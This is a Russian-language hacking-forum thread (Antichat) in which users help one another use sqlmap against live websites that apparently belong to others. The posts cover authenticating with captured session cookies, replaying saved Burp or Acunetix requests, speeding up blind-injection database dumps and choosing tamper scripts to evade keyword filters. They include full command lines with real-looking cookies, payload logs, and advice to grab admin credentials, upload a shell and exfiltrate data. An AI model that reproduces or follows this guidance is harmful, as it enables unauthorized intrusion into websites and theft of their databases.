Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    если тип Time-Blind то потоки игнорируются, будет только 1 работать
     
    _________________________
  2. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0
    Ребят подскажите плиз , как с помощью sqlmap авторизоваться на сайте?

    Есть скуля в пост запросе , найдена при помощи авторизации на сайте

    Пробую :
    --cookie=ASPSESSIONIDCQSDQRSS=OMHKNEDBBDFKPFLFIMDPIANK; test=hello; test=hello; __gads=ID=1632b20c4795492f:T=1512751255:S=ALNI_Mau6tkrI2G96nuA3gdcoN9z5FEQPw; IDE=AHWqTUm_HYOPksLNH_T703Y9aoCsKUaP1ERw7aYLEscedagsiUOuRu1FBORFTVZd; __qca=P0-97155261-1512751246541; _ga=GA1.2.1743265153.1512751247; _gid=GA1.2.1436679549.1512751247; _gat=1

    Идет редирект на страницу авторизации для ввода логина и пасса https://www.xxx.com/index.asp?page=login.asp&cookie_ck=1 и скуля конечно не крутится
     
  3. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    86
    Likes Received:
    69
    Reputations:
    3
    Может сессия закончилась, sqlmap будет спрашивать merge cookie, не соглашайся. Авторизуйся по новой, отследи новые куки и их попробуй подставить.
     
  4. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0
    Попробовал часть cookie заменить , редиректит хз куда , хотя скуля есть 100%
     
  5. Alexandr17

    Alexandr17 Banned

    Joined:
    7 Oct 2017
    Messages:
    109
    Likes Received:
    40
    Reputations:
    0
    Каким сканером скулю нашел? Burpsuite? Бывало и меня sqlmap на 100% скули писал возможно boolean-blind, а потом что ложно. И как-то с 20-го раза где-то, я получил БД, при том же инжекте. Пробуй просканить другим сканером. Netsparker, Acunetix (по лучше будет)... И кинь найденный инжект в sqlmap. Пробуй с --random-agent --level=5 --risk=3. У тебя в POST запросе при авторизации. Пробуй по новой зарегайся на сайте и с помощью BurpSuite опять получи PHPSESSID при авторизации и подставь их. Раскручивай скулю, то есть потоки меняй --threads=10, подставляй темперы --tamper и так далее
     
  6. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0

    Все что ты отписал уже было сделано , https://ibb.co/cqOqLG

    Как я понимаю меп не может подцепить авторизацию , хз почему
     
  7. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    лучше тогда полный запрос с акунетикса скопировать в файл как он есть ,к примеру 1.txt ,указать какой параметр там нужно тестировать * и потом пробовать раскрутить -r 1.txt
     
    _________________________
    Alexandr17 likes this.
  8. Alexandr17

    Alexandr17 Banned

    Joined:
    7 Oct 2017
    Messages:
    109
    Likes Received:
    40
    Reputations:
    0
    Acunetix или Burp это как раз и определяют. Надо в POST запросе найти уязвимый параметр. Netsparker параметр не определил
     
  9. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0
    Делал , не получилось , сразу через ключ -r
    Ой лол все там определило
     
  10. Jenny_victor

    Jenny_victor New Member

    Joined:
    12 Dec 2017
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте! Подскажите пожалуйста, возможно ли как то ускорить скорость дампа, нахождения дб, колонок при слепой инъекции ?
     
  11. Alexandr17

    Alexandr17 Banned

    Joined:
    7 Oct 2017
    Messages:
    109
    Likes Received:
    40
    Reputations:
    0
    Тут зависит многое от скорости интернета. Возможно через прокси, vpn работаешь. Либо через виртуалку. Из-за этого скорость падает
     
  12. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    Если Boolean-Blind то потоки увеличить,как выше написали --threads=10 выше не нужно
    Если Time-Blind и сайт может работать по HTTP а не HTTPS то можно попробовать раскрутить в старой программе Havij та умеет крутить таймблайнд сразу по всем потокам, а не по 1 символу как SQLMAP
    Ну а в идеале конечно нужно искать данные именно админа ,заливаться и уже быстро что нужно сливать, если такая необходимость. Поиск нужных данных в sqlmap --search -T adm --search -C pas ну и т.д
     
    _________________________
  13. Jenny_victor

    Jenny_victor New Member

    Joined:
    12 Dec 2017
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    С интернетом все окей, остальное, что не Blind Sql Injection льется нормально.

    Поиск нужных данных не пригождался, так как все таблицы и колонки находились исправно, но долго
    Boolean-Blind судя по всему вообще не попадались, прибавление потоков ничего не изменило и слив в 10+ окон тоже, а в некоторых случаях дамп крашился

    Попробовал как вы сказали раскрутить в Havij, вроде некоторые сайты получилось, но DB так и не нашло, поле осталось пустым..некоторые и вовсе не удалось


    [22:52:15] [ERROR] invalid character detected. retrying..
    ==================================================
    [17:20:28] [ERROR] invalid character detected. retrying..
    [17:20:28] [WARNING] increasing time delay to 3 seconds
    [17:20:45] [ERROR] invalid character detected. retrying..
    [17:20:45] [WARNING] increasing time delay to 4 seconds
    [17:21:07] [ERROR] invalid character detected. retrying..
    [17:21:07] [WARNING] increasing time delay to 5 seconds
    [17:21:33] [ERROR] invalid character detected. retrying..
    [17:21:33] [WARNING] increasing time delay to 6 seconds
    [17:22:01] [ERROR] invalid character detected. retrying..
    [17:22:01] [WARNING] increasing time delay to 7 seconds
    [17:22:41] [ERROR] unable to properly validate last character value ('v')..
    v
    ====================================================
    [15:00:08] [WARNING] turning off pre-connect mechanism because of connection time out(s)
    ====================================================
    [08:21:27] [INFO] resuming partial value: 0
    [08:21:27] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)

    [08:24:10] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
    ====================================================
     
  14. blackbox

    blackbox Elder - Старейшина

    Joined:
    31 Dec 2011
    Messages:
    362
    Likes Received:
    62
    Reputations:
    11
    Извините за глупый вопрос, но как называется темпер, который ключевые слова разделяет комментариями, типа SELECT - S/**/EL/**/EC/**/T и так далее, чтобы обойти харкдоженую проверку таких слов (движок их ищет в параметрах и отбрасывает). Спасибо.
     
  15. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    такой запрос в оригинале не должен работать
    Code:
    > sel/**/ect 1;
    ERROR 1064 (42000): You have an error in your SQL syntax;..
    
    поиск по тамперам можно сделать так

    Code:
    sqlmapproject/tamper$ grep -rn '/\*\*/' .
    ./randomcomments.py:23:    'I/**/N/**/SERT'
    ./randomcomments.py:39:                    _ += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i])
    ./randomcomments.py:43:                if "/**/" not in _:
    ./randomcomments.py:45:                    _ = word[:index] + "/**/" + word[index:]
    ./informationschemacomment.py:19:    'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'
    ./informationschemacomment.py:25:        retVal = re.sub(r"(?i)(information_schema)\.", "\g<1>/**/.", payload)
    ./space2comment.py:18:    Replaces space character (' ') with comments '/**/'
    ./space2comment.py:30:    'SELECT/**/id/**/FROM/**/users'
    ./space2comment.py:43:                    retVal += "/**/"
    ./space2comment.py:53:                retVal += "/**/"
    
    хм есть тампер randomcomments, кажется тот случай
     
    _________________________
  16. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    71
    Likes Received:
    3
    Reputations:
    0
    Товарищи, подскажите пожалуйста...Берп нашел скулю(говорит, что Firm) в пост запросе, но не в параметрах, а в куках, отправляю запрос в SQLMapper, пытаюсь указать параметр руками через -p, но он даже не пробует его исследовать, шарить только по пост параметрам, в куки не лезет. Склмап вообще умеет такое? Спасибо

    Code:
    sqlmap -u 'http://domen/subscribe' --data='csrf_token=dd5ebc24c145e0d76f5a03c0bda6fd13&email=' --risk=3 -p '__sonar' --dbs --identify-waf --cookie='csrf_cookie=dd5ebc24c145e0d76f5a03c0bda6fd13;PHPSESSID=lctkgerquk3cq59kdatu63v8g2;subscribe_banner_3=closed;notification_reviews=1513720576;notification_not_visited=1513720576;_ga=GA1.2.541204179.1513699936;_gid=GA1.2.57135273.1513699936;__sonar=8822121954744852321;_ym_uid=1513699939609371721;_ym_isad=2;d=45420;_gat=1;WhiteCallback_visitorId=575190449'
     
  17. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    да умеет, выстави --level 3 и -v 3
     
    _________________________
    ShpillyWilly and Alexandr17 like this.
  18. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,114
    Likes Received:
    830
    Reputations:
    231
    лучше полный запрос сохранять в name.txt с указанием __sonar=1* и раскручивать дальше -r "name.txt" пробовать разные варианты merge cookie Y/n
     
    _________________________
    ShpillyWilly likes this.
  19. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    в принципе так тоже крутит

    Code:
    $ python sqlmap.py -u 'https://google.com' --data='csrf_token=dd5ebc24c145e0d76f5a03c0bda6fd13&email=' --risk=3 -p '__sonar' --dbs --identify-waf --cookie='csrf_cookie=dd5ebc24c145e0d76f5a03c0bda6fd13;PHPSESSID=lctkgerquk3cq59kdatu63v8g2;subscribe_banner_3=closed;notification_reviews=1513720576;notification_not_visited=1513720576;_ga=GA1.2.541204179.1513699936;_gid=GA1.2.57135273.1513699936;__sonar=8822121954744852321;_ym_uid=1513699939609371721;_ym_isad=2;d=45420;_gat=1;WhiteCallback_visitorId=575190449' --level 3 -v 3
    .......
    [16:10:01] [WARNING] heuristic (basic) test shows that Cookie parameter '__sonar' might not be injectable
    [16:10:01] [PAYLOAD] 8822121954744852321'fOshsS<'">ZTLwWJ
    [16:10:01] [DEBUG] got HTTP error code: 405 (Method Not Allowed)
    [16:10:01] [INFO] testing for SQL injection on Cookie parameter '__sonar'
    [16:10:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [16:10:01] [PAYLOAD] 8822121954744852321) AND 7339=3997-- JmzL
    [16:10:01] [DEBUG] got HTTP error code: 405 (Method Not Allowed)
    [16:10:01] [PAYLOAD] 8822121954744852321) AND 3724=3724-- YcXU
    [16:10:01] [DEBUG] got HTTP error code: 405 (Method Not Allowed)
    
     
    _________________________
    ShpillyWilly likes this.
  20. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    71
    Likes Received:
    3
    Reputations:
    0
    всем, спасибо, буду пробовать, там еще сложность в том, что есть редирект и возникает еще 500 вариантов, мерджить куки или не мерджить, редиректиться или нет и тд.